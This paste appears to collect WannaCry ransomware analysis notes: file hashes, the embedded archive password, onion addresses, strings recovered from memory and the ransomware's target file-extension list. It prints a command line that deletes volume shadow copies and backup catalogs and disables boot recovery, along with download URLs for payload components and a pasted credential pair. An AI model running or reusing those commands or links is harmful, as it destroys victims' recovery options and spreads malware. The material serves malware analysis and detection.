
something

a guest
May 12th, 2017
  1. md5: 509C41EC97BB81B0567B059AA2F50FE8
  2.  
  3. Contains an embedded resource .zip:
  4. MD5: 5b225149abb8c8eb245445f707e6f0d2
  5. Password: WNcry@2ol7
  6.  
  7. The .zip contains (file name, then hash):
  8. b.wnry c17170262312f3be7027bc2ca825bf0c
  9. c.wnry ae08f79a0d800b82fcbe1b43cdbdbefc
  10. r.wnry 3e0020fc529b1c2a061016dd2469ba96
  11. t.wnry 5dcaac857e695a65f5c3ef1441a73a8f
  12. taskdl.exe 4fef5e34143e646dbf9907c4374276f5
  13. taskse.exe 8495400f199ac77853c53b5a3f278f3e
  14. u.wnry 7bf2b57f2a205768755c07f238fb32cc
  15. m_bulgarian.wnry 95673b0f968c0f55b32204361940d184
  16. m_chinese (simplified).wnry 0252d45ca21c8e43c9742285c48e91ad
  17. m_chinese (traditional).wnry 2efc3690d67cd073a9406a25005f7cea
  18. m_croatian.wnry 17194003fa70ce477326ce2f6deeb270
  19. m_czech.wnry 537efeecdfa94cc421e58fd82a58ba9e
  20. m_danish.wnry 2c5a3b81d5c4715b7bea01033367fcb5
  21. m_dutch.wnry 7a8d499407c6a647c03c4471a67eaad7
  22. m_english.wnry fe68c2dc0d2419b38f44d83f2fcf232e
  23. m_filipino.wnry 08b9e69b57e4c9b966664f8e1c27ab09
  24. m_finnish.wnry 35c2f97eea8819b1caebd23fee732d8f
  25. m_german.wnry 3d59bbb5553fe03a89f817819540f469
  26. m_greek.wnry fb4e8718fea95bb7479727fde80cb424
  27. m_indonesian.wnry 3788f91c694dfc48e12417ce93356b0f
  28. m_italian.wnry 30a200f78498990095b36f574b6e8690
  29. m_japanese.wnry b77e1221f7ecd0b5d696cb66cda1609e
  30. m_korean.wnry 6735cb43fe44832b061eeb3f5956b099
  31. m_latvian.wnry c33afb4ecc04ee1bcc6975bea49abe40
  32. m_norwegian.wnry ff70cc7c00951084175d12128ce02399
  33. m_polish.wnry e79d7f2833a9c2e2553c7fe04a1b63f4
  34. m_portuguese.wnry fa948f7d8dfb21ceddd6794f2d56b44f
  35. m_romanian.wnry 313e0ececd24f4fa1504118a11bc7986
  36. m_russian.wnry 452615db2336d60af7e2057481e4cab5
  37. m_slovak.wnry c911aba4ab1da6c28cf86338ab2ab6cc
  38. m_spanish.wnry 8d61648d34cba8ae9d1e2a219019add1
  39. m_swedish.wnry c7a19984eb9f37198652eaf2fd1ee25c
  40. m_turkish.wnry 531ba6b1a5460fc9446946f91cc8c94b
  41. m_vietnamese.wnry 8419be28a0dcec3f55823620922b00fa
  42.  
  43. Onion addresses:
  44. gx7ekbenv2riucmf.onion
  45. 57g7spgrzlojinas.onion
  46. xxlvbrloxvriy2c5.onion
  47. 76jdd2ir2embyv47.onion
  48. cwwnhwhlz52maqm7.onion
  49.  
  50.  
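  51. Script recovered from memory (address, length, text; each %s is an unfilled format placeholder). It writes m.vbs to create a shortcut, runs it with cscript.exe, then deletes it: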
  52. 0x1000d628, 218, @echo off
  53. echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
  54. echo SET om = ow.CreateShortcut("%s%s")>> m.vbs
  55. echo om.TargetPath = "%s%s">> m.vbs
  56. echo om.Save>> m.vbs
  57. cscript.exe //nologo m.vbs
  58. del m.vbs
  59.  
  60.  
  61.  
  62.  
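  63. u.wnry (embedded strings; the first is a command line that deletes volume shadow copies and the backup catalog and disables boot recovery):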
  64.  
  65. .data:00420FD8 aCVssadminDelet db '/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'
  66.  
  67.  
  68. aFailedToSendYo db 'Failed to send your message!',0Ah
  69. .data:00421318 ; char aYourMessageHas[]
  70. .data:00421318 aYourMessageHas db 'Your message has been sent successfully!',0
  71. .data:00421344 ; char aYouAreSendingT[]
  72. .data:00421344 aYouAreSendingT db 'You are sending too many mails! Please try again %d minutes later'
  73.  
  74.  
  75.  
  76. Process strings (address, length, value; pasted from a chat log):
  77. 00:34 < nulldot> 0x1000ef48, 24, BAYEGANSRV\administrator
  78. 00:34 < nulldot> 0x1000ef7a, 13, Smile465666SA
  79. 00:34 < nulldot> 0x1000efc0, 19, wanna18@hotmail.com
  80. 00:34 < nulldot> 0x1000eff2, 34, 1QAc9S5EmycqjzzWDc1yiWzr9jJLC8sLiY
  81. 00:34 < nulldot> 0x1000f024, 22, sqjolphimrr7jqw6.onion
  82. 00:34 < nulldot> 0x1000f088, 52, https://www.dropbox.com/s/deh8s52zazlyy94/t.zip?dl=1
  83. 00:34 < nulldot> 0x1000f0ec, 67, https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
  84. 00:34 < nulldot> 0x1000f150, 52, https://www.dropbox.com/s/c1gn29iy8erh1ks/m.rar?dl=1
  85. 00:34 < nulldot> 0x1000f1b4, 12, 00000000.eky
  86. 00:34 < nulldot> 0x1000f270, 12, 00000000.pky
  87. 00:34 < nulldot> 0x1000f2a4, 12, 00000000.res
  88.  
  89.  
  90.  
  91. Targeted file extensions (pointer table in .data):
  92. .data:1000D1F8 aCryptacquireco db 'CryptAcquireContextA',0 ; DATA XREF: sub_10004440+2Do
  93. .data:1000D20D align 10h
  94. .data:1000D210 dd offset a_doc ; ".doc"
  95. .data:1000D214 dd offset a_docx ; ".docx"
  96. .data:1000D218 dd offset a_xls ; ".xls"
  97. .data:1000D21C dd offset a_xlsx ; ".xlsx"
  98. .data:1000D220 dd offset a_ppt ; ".ppt"
  99. .data:1000D224 dd offset a_pptx ; ".pptx"
  100. .data:1000D228 dd offset a_pst ; ".pst"
  101. .data:1000D22C dd offset a_ost ; ".ost"
  102. .data:1000D230 dd offset a_msg ; ".msg"
  103. .data:1000D234 dd offset a_eml ; ".eml"
  104. .data:1000D238 dd offset a_vsd ; ".vsd"
  105. .data:1000D23C dd offset a_vsdx ; ".vsdx"
  106. .data:1000D240 dd offset a_txt ; ".txt"
  107. .data:1000D244 dd offset a_csv ; ".csv"
  108. .data:1000D248 dd offset a_rtf ; ".rtf"
  109. .data:1000D24C dd offset a_123 ; ".123"
  110. .data:1000D250 dd offset a_wks ; ".wks"
  111. .data:1000D254 dd offset a_wk1 ; ".wk1"
  112. .data:1000D258 dd offset a_pdf ; ".pdf"
  113. .data:1000D25C dd offset a_dwg ; ".dwg"
  114. .data:1000D260 dd offset a_onetoc2 ; ".onetoc2"
  115. .data:1000D264 dd offset a_snt ; ".snt"
  116. .data:1000D268 dd offset a_jpeg ; ".jpeg"
  117. .data:1000D26C dd offset a_jpg ; ".jpg"
  118. .data:1000D274 dd offset a_docb ; ".docb"
  119. .data:1000D278 dd offset a_docm ; ".docm"
  120. .data:1000D27C dd offset a_dot ; ".dot"
  121. .data:1000D280 dd offset a_dotm ; ".dotm"
  122. .data:1000D284 dd offset a_dotx ; ".dotx"
  123. .data:1000D288 dd offset a_xlsm ; ".xlsm"
  124. .data:1000D28C dd offset a_xlsb ; ".xlsb"
  125. .data:1000D290 dd offset a_xlw ; ".xlw"
  126. .data:1000D294 dd offset a_xlt ; ".xlt"
  127. .data:1000D298 dd offset a_xlm ; ".xlm"
  128. .data:1000D29C dd offset a_xlc ; ".xlc"
  129. .data:1000D2A0 dd offset a_xltx ; ".xltx"
  130. .data:1000D2A4 dd offset a_xltm ; ".xltm"
  131. .data:1000D2A8 dd offset a_pptm ; ".pptm"
  132. .data:1000D2AC dd offset a_pot ; ".pot"
  133. .data:1000D2B0 dd offset a_pps ; ".pps"
  134. .data:1000D2B4 dd offset a_ppsm ; ".ppsm"
  135. .data:1000D2B8 dd offset a_ppsx ; ".ppsx"
  136. .data:1000D2BC dd offset a_ppam ; ".ppam"
  137. .data:1000D2C0 dd offset a_potx ; ".potx"
  138. .data:1000D2C4 dd offset a_potm ; ".potm"
  139. .data:1000D2C8 dd offset a_edb ; ".edb"
  140. .data:1000D2CC dd offset a_hwp ; ".hwp"
  141. .data:1000D2D0 dd offset a_602 ; ".602"
  142. .data:1000D2D4 dd offset a_sxi ; ".sxi"
  143. .data:1000D2D8 dd offset a_sti ; ".sti"
  144. .data:1000D2DC dd offset a_sldx ; ".sldx"
  145. .data:1000D2E0 dd offset a_sldm ; ".sldm"
  146. .data:1000D2E4 dd offset a_sldm ; ".sldm"
  147. .data:1000D2E8 dd offset a_vdi ; ".vdi"
  148. .data:1000D2EC dd offset a_vmdk ; ".vmdk"
  149. .data:1000D2F0 dd offset a_vmx ; ".vmx"
  150. .data:1000D2F4 dd offset a_gpg ; ".gpg"
  151. .data:1000D2F8 dd offset a_aes ; ".aes"
  152. .data:1000D2FC dd offset a_arc ; ".ARC"
  153. .data:1000D300 dd offset a_paq ; ".PAQ"
  154. .data:1000D304 dd offset a_bz2 ; ".bz2"
  155. .data:1000D308 dd offset a_tbk ; ".tbk"
  156. .data:1000D30C dd offset a_bak ; ".bak"
  157. .data:1000D310 dd offset a_tar ; ".tar"
  158. .data:1000D314 dd offset a_tgz ; ".tgz"
  159. .data:1000D318 dd offset a_gz ; ".gz"
  160. .data:1000D31C dd offset a_7z ; ".7z"
  161. .data:1000D320 dd offset a_rar ; ".rar"
  162. .data:1000D324 dd offset a_zip ; ".zip"
  163. .data:1000D328 dd offset a_backup ; ".backup"
  164. .data:1000D32C dd offset a_iso ; ".iso"
  165. .data:1000D330 dd offset a_vcd ; ".vcd"
  166. .data:1000D334 dd offset a_bmp ; ".bmp"
  167. .data:1000D338 dd offset a_png ; ".png"
  168. .data:1000D33C dd offset a_gif ; ".gif"
  169. .data:1000D340 dd offset a_raw ; ".raw"
  170. .data:1000D344 dd offset a_cgm ; ".cgm"
  171. .data:1000D348 dd offset a_tif ; ".tif"
  172. .data:1000D34C dd offset a_tiff ; ".tiff"
  173. .data:1000D350 dd offset a_nef ; ".nef"
  174. .data:1000D354 dd offset a_psd ; ".psd"
  175. .data:1000D358 dd offset a_ai ; ".ai"
  176. .data:1000D35C dd offset a_svg ; ".svg"
  177. .data:1000D360 dd offset a_djvu ; ".djvu"
  178. .data:1000D364 dd offset a_m4u ; ".m4u"
  179. .data:1000D368 dd offset a_m3u ; ".m3u"
  180. .data:1000D36C dd offset a_mid ; ".mid"
  181. .data:1000D370 dd offset a_wma ; ".wma"
  182. .data:1000D374 dd offset a_flv ; ".flv"
  183. .data:1000D378 dd offset a_3g2 ; ".3g2"
  184. .data:1000D37C dd offset a_mkv ; ".mkv"
  185. .data:1000D380 dd offset a_3gp ; ".3gp"
  186. .data:1000D384 dd offset a_mp4 ; ".mp4"
  187. .data:1000D388 dd offset a_mov ; ".mov"
  188. .data:1000D38C dd offset a_avi ; ".avi"
  189. .data:1000D390 dd offset a_asf ; ".asf"
  190. .data:1000D394 dd offset a_mpeg ; ".mpeg"
  191. .data:1000D398 dd offset a_vob ; ".vob"
  192. .data:1000D39C dd offset a_mpg ; ".mpg"
  193. .data:1000D3A0 dd offset a_wmv ; ".wmv"
  194. .data:1000D3A4 dd offset a_fla ; ".fla"
  195. .data:1000D3A8 dd offset a_swf ; ".swf"
  196. .data:1000D3AC dd offset a_wav ; ".wav"
  197. .data:1000D3B0 dd offset a_mp3 ; ".mp3"
  198. .data:1000D3B4 dd offset a_sh ; ".sh"
  199. .data:1000D3B8 dd offset a_class ; ".class"
  200. .data:1000D3BC dd offset a_jar ; ".jar"
  201. .data:1000D3C0 dd offset a_java ; ".java"
  202. .data:1000D3C4 dd offset a_rb ; ".rb"
  203. .data:1000D3C8 dd offset a_asp ; ".asp"
  204. .data:1000D3CC dd offset a_php ; ".php"
  205. .data:1000D3D0 dd offset a_jsp ; ".jsp"
  206. .data:1000D3D4 dd offset a_brd ; ".brd"
  207. .data:1000D3D8 dd offset a_sch ; ".sch"
  208. .data:1000D3DC dd offset a_dch ; ".dch"
  209. .data:1000D3E0 dd offset a_dip ; ".dip"
  210. .data:1000D3E4 dd offset a_pl ; ".pl"
  211. .data:1000D3E8 dd offset a_vb ; ".vb"
  212. .data:1000D3EC dd offset a_vbs ; ".vbs"
  213. .data:1000D3F0 dd offset a_ps1 ; ".ps1"
  214. .data:1000D3F4 dd offset a_bat ; ".bat"
  215. .data:1000D3F8 dd offset a_cmd ; ".cmd"
  216. .data:1000D3FC dd offset a_js ; ".js"
  217. .data:1000D400 dd offset a_asm ; ".asm"
  218. .data:1000D404 dd offset a_h ; ".h"
  219. .data:1000D408 dd offset a_pas ; ".pas"
  220. .data:1000D40C dd offset a_cpp ; ".cpp"
  221. .data:1000D410 dd offset a_c ; ".c"
  222. .data:1000D414 dd offset a_cs ; ".cs"
  223. .data:1000D418 dd offset a_suo ; ".suo"
  224. .data:1000D41C dd offset a_sln ; ".sln"
  225. .data:1000D420 dd offset a_ldf ; ".ldf"
  226. .data:1000D424 dd offset a_mdf ; ".mdf"
  227. .data:1000D428 dd offset a_ibd ; ".ibd"
  228. .data:1000D42C dd offset a_myi ; ".myi"
  229. .data:1000D430 dd offset a_myd ; ".myd"
  230. .data:1000D434 dd offset a_frm ; ".frm"
  231. .data:1000D438 dd offset a_odb ; ".odb"
  232. .data:1000D43C dd offset a_dbf ; ".dbf"
  233. .data:1000D440 dd offset a_db ; ".db"
  234. .data:1000D444 dd offset a_mdb ; ".mdb"
  235. .data:1000D448 dd offset a_accdb ; ".accdb"
  236. .data:1000D44C dd offset a_sql ; ".sql"
  237. .data:1000D450 dd offset a_sqlitedb ; ".sqlitedb"
  238. .data:1000D454 dd offset a_sqlite3 ; ".sqlite3"
  239. .data:1000D458 dd offset a_asc ; ".asc"
  240. .data:1000D45C dd offset a_lay6 ; ".lay6"
  241. .data:1000D460 dd offset a_lay ; ".lay"
  242. .data:1000D464 dd offset a_mml ; ".mml"
  243. .data:1000D468 dd offset a_sxm ; ".sxm"
  244. .data:1000D46C dd offset a_otg ; ".otg"
  245. .data:1000D470 dd offset a_odg ; ".odg"
  246. .data:1000D474 dd offset a_uop ; ".uop"
  247. .data:1000D478 dd offset a_std ; ".std"
  248. .data:1000D47C dd offset a_sxd ; ".sxd"
  249. .data:1000D480 dd offset a_otp ; ".otp"
  250. .data:1000D484 dd offset a_odp ; ".odp"
  251. .data:1000D488 dd offset a_wb2 ; ".wb2"
  252. .data:1000D48C dd offset a_slk ; ".slk"
  253. .data:1000D490 dd offset a_dif ; ".dif"
  254. .data:1000D494 dd offset a_stc ; ".stc"
  255. .data:1000D498 dd offset a_sxc ; ".sxc"
  256. .data:1000D49C dd offset a_ots ; ".ots"
  257. .data:1000D4A0 dd offset a_ods ; ".ods"
  258. .data:1000D4A4 dd offset a_3dm ; ".3dm"
  259. .data:1000D4A8 dd offset a_max ; ".max"
  260. .data:1000D4AC dd offset a_3ds ; ".3ds"
  261. .data:1000D4B0 dd offset a_uot ; ".uot"
  262. .data:1000D4B4 dd offset a_stw ; ".stw"
  263. .data:1000D4B8 dd offset a_sxw ; ".sxw"
  264. .data:1000D4BC dd offset a_ott ; ".ott"
  265. .data:1000D4C0 dd offset a_odt ; ".odt"
  266. .data:1000D4C4 dd offset a_pem ; ".pem"
  267. .data:1000D4C8 dd offset a_p12 ; ".p12"
  268. .data:1000D4CC dd offset a_csr ; ".csr"
  269. .data:1000D4D0 dd offset a_crt ; ".crt"
  270. .data:1000D4D4 dd offset a_key ; ".key"
  271. .data:1000D4D8 dd offset a_pfx ; ".pfx"
  272. .data:1000D4DC dd offset a_der ; ".der"